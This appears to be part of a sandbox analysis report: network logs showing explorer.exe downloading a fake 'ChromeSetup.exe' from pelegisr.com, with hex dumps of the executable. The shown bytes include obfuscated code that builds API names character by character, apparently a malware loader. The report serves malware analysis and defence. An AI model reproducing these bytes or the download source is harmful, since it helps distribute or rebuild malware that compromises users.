                                                                                                                2022-10-13 11:07:31 UTC3535INData Raw: 00 2d 66 07 00 d0 09 11 00 30 66 07 00 6a 66 07 00 80 eb 10 00 70 66 07 00 bf 66 07 00 78 eb 10 00 c0 66 07 00 64 67 07 00 bc 07 11 00 64 67 07 00 38 68 07 00 80 eb 10 00 38 68 07 00 c7 6a 07 00 d0 07 11 00 c8 6a 07 00 f9 6b 07 00 80 25 11 00 34 6c 07 00 a2 6c 07 00 94 eb 10 00 a4 6c 07 00 08 6d 07 00 4c 07 11 00 08 6d 07 00 49 6d 07 00 80 eb 10 00 4c 6d 07 00 54 6f 07 00 18 2f 11 00 54 6f 07 00 9d 6f 07 00 80 eb 10 00 a0 6f 07 00 08 70 07 00 bc 07 11 00 08 70 07 00 ce 70 07 00 e8 07 11 00 d0 70 07 00 60 72 07 00 1c 38 11 00 60 72 07 00 f8 72 07 00 80 eb 10 00 34 73 07 00 a5 74 07 00 f4 36 11 00 a8 74 07 00 ff 79 07 00 c0 30 11 00 00 7a 07 00 95 7f 07 00 34 38 11 00 98 7f 07 00 60 80 07 00 8c 07 11 00 60 80 07 00 34 81 07 00 bc 07 11 00 34 81 07 00 bb 81
                                                                                                                Data Ascii: -f0fjfpffxfdgdg8h8hjjk%4lllmLmImLmTo/Tooopppp`r8`rr4st6ty0z48``44
                                                                                                                2022-10-13 11:07:31 UTC3551INData Raw: 00 08 91 11 00 cc 91 0d 00 ff 92 0d 00 08 91 11 00 2c 93 0d 00 e7 93 0d 00 28 91 11 00 f0 93 0d 00 4b 94 0d 00 30 91 11 00 4b 94 0d 00 6f 97 0d 00 48 91 11 00 6f 97 0d 00 8d 97 0d 00 6c 91 11 00 90 97 0d 00 a7 97 0d 00 94 eb 10 00 a8 97 0d 00 3f 99 0d 00 84 2a 11 00 40 99 0d 00 14 9a 0d 00 d0 07 11 00 14 9a 0d 00 7d 9a 0d 00 4c 0e 11 00 80 9a 0d 00 a0 9a 0d 00 a4 07 11 00 d8 9a 0d 00 ad 9c 0d 00 7c 91 11 00 b0 9c 0d 00 53 9d 0d 00 78 eb 10 00 54 9d 0d 00 11 9e 0d 00 60 2f 11 00 14 9e 0d 00 71 a1 0d 00 98 91 11 00 74 a1 0d 00 fd a1 0d 00 84 89 11 00 00 a2 0d 00 63 a2 0d 00 78 eb 10 00 64 a2 0d 00 84 a2 0d 00 78 eb 10 00 84 a2 0d 00 d0 a2 0d 00 78 eb 10 00 d0 a2 0d 00 20 a3 0d 00 78 eb 10 00 f0 a3 0d 00 9b a9 0d 00 c0 91 11 00 9c a9 0d 00 ee a9 0d 00 9c eb
                                                                                                                Data Ascii: ,(K0KoHol?*@}L|SxT`/qtcxdxx x


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                1192.168.2.549700185.220.204.62443C:\Windows\explorer.exe
                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                2022-10-13 11:07:35 UTC3555OUTGET /upload/ChromeSetup.exe HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Host: pelegisr.com
                                                                                                                2022-10-13 11:07:35 UTC3555INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 13 Oct 2022 11:07:34 GMT
                                                                                                                Server: Apache
                                                                                                                Last-Modified: Thu, 13 Oct 2022 10:50:03 GMT
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 214528
                                                                                                                Connection: close
                                                                                                                Content-Type: application/x-msdownload
                                                                                                                2022-10-13 11:07:35 UTC3555INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 93 9c 0f ba d7 fd 61 e9 d7 fd 61 e9 d7 fd 61 e9 c9 af f4 e9 c0 fd 61 e9 c9 af e2 e9 ac fd 61 e9 f0 3b 1a e9 d0 fd 61 e9 d7 fd 60 e9 41 fd 61 e9 c9 af e5 e9 e3 fd 61 e9 c9 af f5 e9 d6 fd 61 e9 c9 af f0 e9 d6 fd 61 e9 52 69 63 68 d7 fd 61 e9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 c6 b3 7f 60 00 00 00 00 00 00 00 00 e0 00 03
                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$aaaaa;a`AaaaaRichaPEL`
                                                                                                                2022-10-13 11:07:35 UTC3563INData Raw: 00 00 00 73 70 61 6e 69 73 68 2d 67 75 61 74 65 6d 61 6c 61 00 00 00 73 70 61 6e 69 73 68 2d 65 6c 20 73 61 6c 76 61 64 6f 72 00 73 70 61 6e 69 73 68 2d 65 63 75 61 64 6f 72 00 73 70 61 6e 69 73 68 2d 64 6f 6d 69 6e 69 63 61 6e 20 72 65 70 75 62 6c 69 63 00 00 73 70 61 6e 69 73 68 2d 63 6f 73 74 61 20 72 69 63 61 00 00 73 70 61 6e 69 73 68 2d 63 6f 6c 6f 6d 62 69 61 00 00 00 00 73 70 61 6e 69 73 68 2d 63 68 69 6c 65 00 00 00 73 70 61 6e 69 73 68 2d 62 6f 6c 69 76 69 61 00 73 70 61 6e 69 73 68 2d 61 72 67 65 6e 74 69 6e 61 00 00 00 70 6f 72 74 75 67 75 65 73 65 2d 62 72 61 7a 69 6c 69 61 6e 00 00 00 00 6e 6f 72 77 65 67 69 61 6e 2d 6e 79 6e 6f 72 73 6b 00 00 00 6e 6f 72 77 65 67 69 61 6e 2d 62 6f 6b 6d 61 6c 00 00 00 00 6e 6f 72 77 65 67 69 61 6e 00 00 00
                                                                                                                Data Ascii: spanish-guatemalaspanish-el salvadorspanish-ecuadorspanish-dominican republicspanish-costa ricaspanish-colombiaspanish-chilespanish-boliviaspanish-argentinaportuguese-braziliannorwegian-nynorsknorwegian-bokmalnorwegian
                                                                                                                2022-10-13 11:07:35 UTC3571INData Raw: 3a 00 00 c3 c2 04 00 55 8b ec 51 56 be 08 0e 43 00 56 c6 05 0e 0e 43 00 33 c6 05 0f 0e 43 00 32 c6 05 13 0e 43 00 6c c6 05 0b 0e 43 00 6e c6 05 08 0e 43 00 6b c6 05 0c 0e 43 00 65 c6 05 0d 0e 43 00 6c c6 05 09 0e 43 00 65 c6 05 0a 0e 43 00 72 c6 05 10 0e 43 00 2e c6 05 11 0e 43 00 64 c6 05 12 0e 43 00 6c c6 05 14 0e 43 00 00 ff 15 30 11 40 00 56 50 a3 4c 8e 58 00 c6 05 13 0e 43 00 65 c6 05 09 0e 43 00 69 c6 05 0c 0e 43 00 75 c6 05 0e 0e 43 00 6c c6 05 0d 0e 43 00 61 c6 05 11 0e 43 00 6f c6 05 15 0e 43 00 74 c6 05 08 0e 43 00 56 c6 05 14 0e 43 00 63 c6 05 0f 0e 43 00 50 c6 05 16 0e 43 00 00 c6 05 0b 0e 43 00 74 c6 05 12 0e 43 00 74 c6 05 0a 0e 43 00 72 c6 05 10 0e 43 00 72 ff 15 68 10 40 00 8d 4d fc 51 6a 40 ff 35 d0 a9 58 00 a3 04 0e 43 00 ff 35 4c 53 58
                                                                                                                Data Ascii: :UQVCVC3C2ClCnCkCeClCeCrC.CdClC0@VPLXCeCiCuClCaCoCtCVCcCPCCtCtCrCrh@MQj@5XC5LSX
                                                                                                                2022-10-13 11:07:35 UTC3579INData Raw: ce 5e e9 81 e6 ff ff 56 51 8b f1 8b cc e8 0d f6 ff ff 8b ce e8 5e f3 ff ff 6a 00 6a 00 8b ce e8 aa fb ff ff 8b c6 5e c3 6a 00 6a 01 e8 9d fb ff ff c3 55 8b ec 56 8d 71 ac 8b ce e8 b4 ff ff ff f6 45 08 01 74 07 56 e8 47 29 00 00 59 8b c6 5e 5d c2 04 00 55 8b ec 51 56 51 8b f1 8d 45 08 8b cc 89 65 fc 50 e8 0d f3 ff ff 8b ce e8 0c fc ff ff 8b c6 5e c9 c2 04 00 b8 32 a6 41 00 e8 11 2e 00 00 51 56 8b f1 89 75 f0 e8 33 f3 ff ff ff 75 08 83 65 fc 00 8b ce c7 06 00 15 40 00 e8 6b e8 ff ff 50 6a 00 6a 00 8b ce e8 fe fb ff ff 8b 4d f4 8b c6 5e 64 89 0d 00 00 00 00 c9 c2 04 00 55 8b ec 56 57 8b f1 e8 62 f3 ff ff 8b 7d 08 3b c7 73 05 e8 6c 25 00 00 39 7e 18 73 0d ff 76 14 8b ce 57 e8 bc fc ff ff eb 2c 80 7d 0c 00 74 1a 83 ff 10 73 15 8b 46 14 3b f8 73 02 8b c7 50 6a
                                                                                                                Data Ascii: ^VQ^jj^jjUVqEtVG)Y^]UQVQEeP^2A.QVu3ue@kPjjM^dUVWb};sl%9~svW,}tsF;sPj
                                                                                                                2022-10-13 11:07:35 UTC3586INData Raw: 46 04 e8 f2 25 00 00 59 59 89 46 08 85 c0 74 1f 68 00 02 00 00 e8 96 1c 00 00 50 ff 76 08 e8 2c 22 00 00 83 c4 0c c7 46 0c 01 00 00 00 eb 0c e8 7c 1c 00 00 83 66 0c 00 89 46 08 8b c6 5e 5d c3 8b ff 56 e8 d6 21 00 00 8b 70 08 e8 a8 21 00 00 8b d0 8b c6 5e c3 8b ff 57 68 d8 fa 42 00 8b f9 ff 15 14 11 40 00 85 c0 75 19 56 be f0 a9 58 00 56 e8 72 07 00 00 83 c6 18 81 fe 50 aa 58 00 59 7c ee 5e 8b c7 5f c3 68 d8 fa 42 00 ff 15 18 10 40 00 85 c0 7d 19 56 be f0 a9 58 00 56 e8 56 07 00 00 83 c6 18 81 fe 50 aa 58 00 59 7c ee 5e c3 8b ff 55 8b ec 8b 45 08 83 f8 04 56 8b f1 89 06 7d 0f 6b c0 18 05 f0 a9 58 00 50 e8 38 07 00 00 59 8b c6 5e 5d c2 04 00 8b 01 83 f8 04 7d 0f 6b c0 18 05 f0 a9 58 00 50 e8 2b 07 00 00 59 c3 8b ff 55 8b ec ff 75 08 e8 49 27 00 00 59 85 c0
                                                                                                                Data Ascii: F%YYFthPv,"F|fF^]V!p!^WhB@uVXVrPXY|^_hB@}VXVVPXY|^UEV}kXP8Y^]}kXP+YUuI'Y
                                                                                                                2022-10-13 11:07:35 UTC3594INData Raw: 15 7c 11 40 00 85 c0 0f 84 2f 02 00 00 83 7d e8 05 0f 87 25 02 00 00 0f b7 45 e8 83 f8 01 89 45 d0 7e 2d 38 5d ee 74 28 8d 45 ef 8a 08 3a cb 74 1f 0f b6 78 ff 0f b6 c9 eb 0b 8b 4d dc c6 04 0f 20 0f b6 08 47 3b f9 7e f1 40 40 38 58 ff 75 db 8b 45 e4 53 53 ff 76 04 05 00 01 00 00 50 68 00 01 00 00 ff 75 dc 89 45 c0 6a 01 53 e8 cc 6d 00 00 83 c4 20 85 c0 0f 84 c0 01 00 00 8b 4d e0 8b 45 dc 53 ff 76 04 bf ff 00 00 00 57 81 c1 81 00 00 00 51 57 40 50 68 00 01 00 00 ff 76 14 53 e8 87 fc ff ff 83 c4 24 85 c0 0f 84 8d 01 00 00 8b 45 d8 53 ff 76 04 05 81 00 00 00 57 50 8b 45 dc 57 40 50 68 00 02 00 00 ff 76 14 53 e8 5a fc ff ff 83 c4 24 85 c0 0f 84 60 01 00 00 8b 45 e4 8b 7d e0 8d 88 fe 00 00 00 33 d2 83 7d d0 01 66 89 11 8b 55 d8 89 4d c4 8d 8f 80 00 00 00 88 5f
                                                                                                                Data Ascii: |@/}%EE~-8]t(E:txM G;~@@8XuESSvPhuEjSm MESvWQW@PhvS$ESvWPEW@PhvSZ$`E}3}fUM_
                                                                                                                2022-10-13 11:07:35 UTC3602INData Raw: 8b 45 dc 89 47 fc ff 75 d8 e8 10 d0 ff ff 59 e8 d7 11 00 00 8b 4d d4 89 88 88 00 00 00 e8 c9 11 00 00 8b 4d d0 89 88 8c 00 00 00 81 3e 63 73 6d e0 75 42 83 7e 10 03 75 3c 8b 46 14 3d 20 05 93 19 74 0e 3d 21 05 93 19 74 07 3d 22 05 93 19 75 24 83 7d cc 00 75 1e 83 7d e4 00 74 18 ff 76 18 e8 92 cf ff ff 59 85 c0 74 0b ff 75 10 56 e8 12 fd ff ff 59 59 c3 6a 0c 68 50 d4 41 00 e8 75 21 00 00 33 d2 89 55 e4 8b 45 10 8b 48 04 3b ca 0f 84 58 01 00 00 38 51 08 0f 84 4f 01 00 00 8b 48 08 3b ca 75 0c f7 00 00 00 00 80 0f 84 3c 01 00 00 8b 00 8b 75 0c 85 c0 78 04 8d 74 31 0c 89 55 fc 33 db 43 53 a8 08 74 41 8b 7d 08 ff 77 18 e8 2b 82 00 00 59 59 85 c0 0f 84 f2 00 00 00 53 56 e8 1a 82 00 00 59 59 85 c0 0f 84 e1 00 00 00 8b 47 18 89 06 8b 4d 14 83 c1 08 51 50 e8 d9 fc
                                                                                                                Data Ascii: EGuYMM>csmuB~u<F= t=!t="u$}u}tvYtuVYYjhPAu!3UEH;X8QOH;u<uxt1U3CStA}w+YYSVYYGMQP
                                                                                                                2022-10-13 11:07:35 UTC3610INData Raw: ff d3 ee 83 4d f8 ff eb 0d 83 c1 e0 83 ca ff 33 f6 d3 ea 89 55 f8 8b 0d 28 c9 58 00 8b d9 eb 11 8b 53 04 8b 3b 23 55 f8 23 fe 0b d7 75 0a 83 c3 14 89 5d 08 3b d8 72 e8 3b d8 75 7f 8b 1d 20 c9 58 00 eb 11 8b 53 04 8b 3b 23 55 f8 23 fe 0b d7 75 0a 83 c3 14 89 5d 08 3b d9 72 e8 3b d9 75 5b eb 0c 83 7b 08 00 75 0a 83 c3 14 89 5d 08 3b d8 72 f0 3b d8 75 31 8b 1d 20 c9 58 00 eb 09 83 7b 08 00 75 0a 83 c3 14 89 5d 08 3b d9 72 f0 3b d9 75 15 e8 a0 fa ff ff 8b d8 89 5d 08 85 db 75 07 33 c0 e9 09 02 00 00 53 e8 3a fb ff ff 59 8b 4b 10 89 01 8b 43 10 83 38 ff 74 e5 89 1d 28 c9 58 00 8b 43 10 8b 10 89 55 fc 83 fa ff 74 14 8b 8c 90 c4 00 00 00 8b 7c 90 44 23 4d f8 23 fe 0b cf 75 29 83 65 fc 00 8b 90 c4 00 00 00 8d 48 44 8b 39 23 55 f8 23 fe 0b d7 75 0e ff 45 fc 8b 91
                                                                                                                Data Ascii: M3U(XS;#U#u];r;u XS;#U#u];r;u[{u];r;u1 X{u];r;u]u3S:YKC8t(XCUt|D#M#u)eHD9#U#uE
                                                                                                                2022-10-13 11:07:35 UTC3618INData Raw: 55 08 74 09 8b 4d 08 83 45 08 04 89 31 ff 07 33 ff 47 33 d2 eb 03 40 40 42 66 83 38 5c 74 f7 66 83 38 22 75 38 f6 c2 01 75 20 83 7d fc 00 74 0d 8d 48 02 66 83 39 22 75 04 8b c1 eb 0d 33 c9 33 ff 39 4d fc 0f 94 c1 89 4d fc d1 ea eb 0f 4a 85 f6 74 08 6a 5c 59 66 89 0e 46 46 ff 03 85 d2 75 ed 0f b7 08 66 85 c9 74 24 39 55 fc 75 0c 66 83 f9 20 74 19 66 83 f9 09 74 13 85 ff 74 0b 85 f6 74 05 66 89 0e 46 46 ff 03 40 40 eb 82 85 f6 74 07 33 c9 66 89 0e 46 46 ff 03 8b 7d 0c e9 32 ff ff ff 8b 45 08 3b c2 74 02 89 10 ff 07 5f 5e c9 c3 8b ff 55 8b ec 51 51 53 56 57 68 04 01 00 00 be 40 b1 58 00 56 33 c0 33 db 53 66 a3 48 b3 58 00 ff 15 b8 11 40 00 a1 38 c9 58 00 89 35 00 ae 58 00 3b c3 74 07 8b f8 66 39 18 75 02 8b fe 8d 45 fc 50 53 8d 5d f8 33 c9 8b c7 e8 60 fe ff
                                                                                                                Data Ascii: UtME13G3@@Bf8\tf8"u8u }tHf9"u339MMJtj\YfFFuft$9Uuf tftttfFF@@t3fFF}2E;t_^UQQSVWh@XV33SfHX@8X5X;tf9uEPS]3`
                                                                                                                2022-10-13 11:07:35 UTC3626INData Raw: ff ff 8b f8 59 59 89 7d 08 3b fe 75 08 33 c0 40 e9 77 01 00 00 8b b3 bc 00 00 00 6a 0c 59 6a 04 f3 a5 e8 4d 89 ff ff 33 f6 59 89 45 f8 3b c6 75 0b ff 75 08 e8 d0 73 ff ff 59 eb d1 89 30 39 73 1c 0f 84 bb 00 00 00 6a 04 e8 26 89 ff ff 59 89 45 fc 3b c6 75 1c 33 f6 46 ff 75 08 e8 a8 73 ff ff ff 75 f8 e8 a0 73 ff ff 59 59 8b c6 e9 1a 01 00 00 89 30 8b 75 08 0f b7 7b 3e 56 6a 0e 57 8d 45 e8 6a 01 50 e8 f5 f0 ff ff 89 45 f4 8d 46 04 50 6a 0f 57 8d 45 e8 6a 01 50 e8 e0 f0 ff ff 09 45 f4 8d 46 08 50 6a 10 57 89 45 f0 8d 45 e8 6a 01 50 e8 c8 f0 ff ff 83 c4 3c 0b 45 f4 74 0c 56 e8 bd fe ff ff 59 83 ce ff eb 8e 8b 45 f0 8b 00 eb 12 8a 08 80 f9 30 7c 12 80 f9 39 7f 0d 80 e9 30 88 08 40 80 38 00 75 e9 eb 37 80 f9 3b 75 f3 8b f0 8d 7e 01 8a 0f 88 0e 8b f7 80 3e 00 75
                                                                                                                Data Ascii: YY};u3@wjYjM3YE;uusY09sj&YE;u3FususYY0u{>VjWEjPEFPjWEjPEFPjWEEjP<EtVYE0|90@8u7;u~>u
                                                                                                                2022-10-13 11:07:35 UTC3633INData Raw: f6 0f 85 41 f3 ff ff 0f b6 70 e6 0f b6 51 e6 2b f2 74 15 33 d2 85 f6 0f 9f c2 8d 54 12 ff 8b f2 85 f6 0f 85 20 f3 ff ff 0f b6 70 e7 0f b6 51 e7 2b f2 74 15 33 d2 85 f6 0f 9f c2 8d 54 12 ff 8b f2 85 f6 0f 85 ff f2 ff ff 0f b6 70 e8 0f b6 51 e8 2b f2 74 11 33 d2 85 f6 0f 9f c2 8d 54 12 ff 8b f2 eb 02 33 f6 85 f6 0f 85 da f2 ff ff 8b 50 e9 3b 51 e9 74 7d 0f b6 f2 0f b6 51 e9 2b f2 74 15 33 d2 85 f6 0f 9f c2 8d 54 12 ff 8b f2 85 f6 0f 85 b2 f2 ff ff 0f b6 70 ea 0f b6 51 ea 2b f2 74 15 33 d2 85 f6 0f 9f c2 8d 54 12 ff 8b f2 85 f6 0f 85 91 f2 ff ff 0f b6 70 eb 0f b6 51 eb 2b f2 74 15 33 d2 85 f6 0f 9f c2 8d 54 12 ff 8b f2 85 f6 0f 85 70 f2 ff ff 0f b6 70 ec 0f b6 51 ec 2b f2 74 11 33 d2 85 f6 0f 9f c2 8d 54 12 ff 8b f2 eb 02 33 f6 85 f6 0f 85 4b f2 ff ff 8b 50
                                                                                                                Data Ascii: ApQ+t3T pQ+t3TpQ+t3T3P;Qt}Q+t3TpQ+t3TpQ+t3TppQ+t3T3KP
                                                                                                                2022-10-13 11:07:35 UTC3641INData Raw: eb 13 8a 47 fc 88 85 f4 fd ff ff c7 85 e0 fd ff ff 01 00 00 00 8d 85 f4 fd ff ff 89 85 e4 fd ff ff e9 31 04 00 00 8b 07 83 c7 04 89 bd dc fd ff ff 85 c0 74 3c 8b 48 04 85 c9 74 35 f7 85 f0 fd ff ff 00 08 00 00 0f bf 00 89 8d e4 fd ff ff 74 14 99 2b c2 d1 f8 c7 85 c8 fd ff ff 01 00 00 00 e9 ec 03 00 00 83 a5 c8 fd ff ff 00 e9 e0 03 00 00 a1 10 00 43 00 89 85 e4 fd ff ff 50 e8 1d 4d ff ff 59 e9 c9 03 00 00 83 f8 70 0f 8f f5 01 00 00 0f 84 e1 01 00 00 83 f8 65 0f 8c b7 03 00 00 83 f8 67 0f 8e 32 fe ff ff 83 f8 69 74 6d 83 f8 6e 74 24 83 f8 6f 0f 85 9b 03 00 00 f6 85 f0 fd ff ff 80 89 b5 e0 fd ff ff 74 61 81 8d f0 fd ff ff 00 02 00 00 eb 55 8b 37 83 c7 04 89 bd dc fd ff ff e8 26 f7 ff ff 85 c0 0f 84 19 fa ff ff f6 85 f0 fd ff ff 20 74 0c 66 8b 85 d8 fd ff ff
                                                                                                                Data Ascii: G1t<Ht5t+CPMYpeg2itmnt$otaU7& tf
                                                                                                                2022-10-13 11:07:35 UTC3649INData Raw: f7 d7 8b 5d 08 8d 5c 9d e0 8b 33 8b ce 23 cf 89 4d f0 8b ca d3 ee 8b 4d fc 0b 75 f4 89 33 8b 75 f0 d3 e6 ff 45 08 83 7d 08 03 89 75 f4 7c d3 8b f0 6a 02 c1 e6 02 8d 4d e8 5a 2b ce 3b d0 7c 08 8b 31 89 74 95 e0 eb 05 83 64 95 e0 00 4a 83 e9 04 85 d2 7d e7 6a 02 33 db 58 e9 5a 01 00 00 3b 1d 84 0a 43 00 8b 0d 90 0a 43 00 0f 8c ad 00 00 00 33 c0 8d 7d e0 ab ab ab 81 4d e0 00 00 00 80 8b c1 99 83 e2 1f 03 c2 8b d1 c1 f8 05 81 e2 1f 00 00 80 79 05 4a 83 ca e0 42 83 65 f4 00 83 65 08 00 83 cf ff 8b ca d3 e7 c7 45 fc 20 00 00 00 29 55 fc f7 d7 8b 5d 08 8d 5c 9d e0 8b 33 8b ce 23 cf 89 4d f0 8b ca d3 ee 8b 4d fc 0b 75 f4 89 33 8b 75 f0 d3 e6 ff 45 08 83 7d 08 03 89 75 f4 7c d3 8b f0 6a 02 c1 e6 02 8d 4d e8 5a 2b ce 3b d0 7c 08 8b 31 89 74 95 e0 eb 05 83 64 95 e0
                                                                                                                Data Ascii: ]\3#MMu3uE}u|jMZ+;|1tdJ}j3XZ;CC3}MyJBeeE )U]\3#MMu3uE}u|jMZ+;|1td
                                                                                                                2022-10-13 11:07:35 UTC3657INData Raw: 74 1c 8d 4f 01 33 d2 3b cf 72 05 83 f9 01 73 03 33 d2 42 89 48 04 85 d2 74 04 43 89 58 08 ff 4d 0c ff 45 08 83 7d 0c 00 0f 87 e4 fe ff ff 33 f6 eb 26 8b 48 04 8b d1 c1 ea 10 89 50 08 8b 10 8b fa c1 e1 10 c1 ef 10 0b cf c1 e2 10 81 45 e8 f0 ff 00 00 89 48 04 89 10 39 70 08 74 d5 bb 00 80 00 00 85 58 08 75 30 8b 30 8b 78 04 81 45 e8 ff ff 00 00 8b ce 03 f6 c1 e9 1f 89 30 8d 34 3f 0b f1 8b 48 08 8b d7 c1 ea 1f 03 c9 0b ca 89 70 04 89 48 08 85 cb 74 d0 66 8b 4d e8 66 89 48 0a 8b 4d fc 5f 5e 33 cd 5b e8 fe 0e ff ff c9 c3 6a 08 68 c0 d7 41 00 e8 7d 46 ff ff 33 c0 39 05 14 c9 58 00 74 56 f6 45 08 40 74 48 39 05 fc 0d 43 00 74 40 89 45 fc 0f ae 55 08 eb 2e 8b 45 ec 8b 00 8b 00 3d 05 00 00 c0 74 0a 3d 1d 00 00 c0 74 03 33 c0 c3 33 c0 40 c3 8b 65 e8 83 25 fc 0d 43
                                                                                                                Data Ascii: tO3;rs3BHtCXME}3&HPEH9ptXu00xE04?HpHtfMfHM_^3[jhA}F39XtVE@tH9Ct@EU.E=t=t33@e%C
                                                                                                                2022-10-13 11:07:35 UTC3665INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                Data Ascii:
                                                                                                                2022-10-13 11:07:35 UTC3672INData Raw: 72 54 6f 4d 75 6c 74 69 42 79 74 65 00 1a 03 4d 75 6c 74 69 42 79 74 65 54 6f 57 69 64 65 43 68 61 72 00 21 04 53 6c 65 65 70 00 b4 02 49 6e 69 74 69 61 6c 69 7a 65 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 00 be 00 44 65 6c 65 74 65 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 00 92 03 52 74 6c 55 6e 77 69 6e 64 00 5a 03 52 61 69 73 65 45 78 63 65 70 74 69 6f 6e 00 00 e6 01 47 65 74 4c 61 73 74 45 72 72 6f 72 00 00 a1 02 48 65 61 70 46 72 65 65 00 00 2d 04 54 65 72 6d 69 6e 61 74 65 50 72 6f 63 65 73 73 00 00 a9 01 47 65 74 43 75 72 72 65 6e 74 50 72 6f 63 65 73 73 00 3e 04 55 6e 68 61 6e 64 6c 65 64 45 78 63 65 70 74 69 6f 6e 46 69 6c 74 65 72 00 00 15 04 53 65 74 55 6e 68 61 6e 64 6c 65 64 45 78 63 65 70 74 69 6f 6e 46 69 6c 74 65 72 00 d1 02 49 73
                                                                                                                Data Ascii: rToMultiByteMultiByteToWideChar!SleepInitializeCriticalSectionDeleteCriticalSectionRtlUnwindZRaiseExceptionGetLastErrorHeapFree-TerminateProcessGetCurrentProcess>UnhandledExceptionFilterSetUnhandledExceptionFilterIs
                                                                                                                2022-10-13 11:07:35 UTC3680INData Raw: 90 6c 8f 17 04 33 11 2f 11 b9 cd 32 53 f3 fa e6 d2 d1 b6 f7 96 87 ac 90 70 a4 a2 9f 8a aa 28 37 64 0e 1b a6 78 21 25 68 50 cb e2 1e 43 07 5b 91 c5 91 13 16 ec b9 a1 02 16 bb e2 10 4c f9 e5 36 d0 b9 44 7d 43 a8 ea cd 9e 47 15 c3 68 f0 1c 0b 24 0b cd ef ec 44 e1 74 af 3f 71 12 61 4a 64 68 6a f2 41 49 fd be 2e ee 98 1f ff 04 b3 e8 26 b0 e6 c1 f3 76 8e d7 d4 28 ae c5 aa d8 30 5c cc 7f a1 66 47 65 c4 ae 48 e0 aa ac 21 98 eb b1 49 df d7 cb 28 c5 61 a8 1f ce 75 3e 47 af 77 cf ba 3e 64 3e 85 ec f0 2c 42 32 e9 cd 94 9a 1f 22 d4 e7 19 8f b9 cb 85 2b 2a 69 85 6b c5 cf 47 b9 f5 97 00 e5 c5 86 db d7 6c 46 87 57 68 14 9f 9a 72 01 60 3a 61 47 b0 16 7d 00 69 50 84 99 d8 6b 29 c0 73 b6 ae 50 0c 24 98 95 e6 49 61 d4 47 7e 47 5b a2 fd 37 14 02 81 65 5a 83 62 76 84 ac 68 40
                                                                                                                Data Ascii: l3/2Sp(7dx!%hPC[L6D}CGh$Dt?qaJdhjAI.&v(0\fGeH!I(au>Gw>d>,B2"+*ikGlFWhr`:aG}iPk)sP$IaG~G[7eZbvh@
                                                                                                                2022-10-13 11:07:35 UTC3688INData Raw: de 87 0a a9 fd 54 7e ef ab 70 db 71 57 5e 52 32 9a 7b 13 32 4d da 83 45 01 6c 3d bc bd 27 49 77 ca 9e 6a f8 59 50 78 39 4a 0f 1a 8f 0a 41 2e ec 4c 3d 3c 57 8e 1a 8c 6c b0 27 ab 25 70 f7 a6 73 e2 ac 5b 8a 1f 3a 6c de ba e7 75 c4 15 9f 20 68 ac ce cf 4e ad 3d 9d 7f a9 80 af ca d5 29 66 8e 8d 1a 62 ad 95 d7 b4 1e 96 30 17 14 c9 53 0b ea 19 de 30 04 9e 49 da af 66 79 cb 4e 77 7e 22 19 32 12 4c 3b 1e be b3 29 f3 f8 3d 22 8c a8 67 c6 5b 03 8f b2 9f 6a 57 02 b4 01 cb a5 42 3d b4 82 15 e3 69 e0 a3 fe cf c3 92 cf 79 2d 40 32 93 f7 fe 5f 8f 73 96 2a 68 a2 0c 09 03 cd 3b a6 6b fa 40 eb 6c 12 87 71 91 f5 e1 40 57 72 4d 4f bd e7 72 1e 37 89 41 d1 a7 c4 75 94 27 7f 4e 11 1c 4a a1 c2 81 60 36 89 c0 5e fa 35 26 e7 37 55 98 65 5a 32 55 9c 06 56 73 5e c2 7c f3 9d 13 8d 2c
                                                                                                                Data Ascii: T~pqW^R2{2MEl='IwjYPx9JA.L=<Wl'%ps[:lu hN=)fb0S0IfyNw~"2L;)="g[jWB=iy-@2_s*h;k@lq@WrMOr7Au'NJ`6^5&7UeZ2UVs^|,
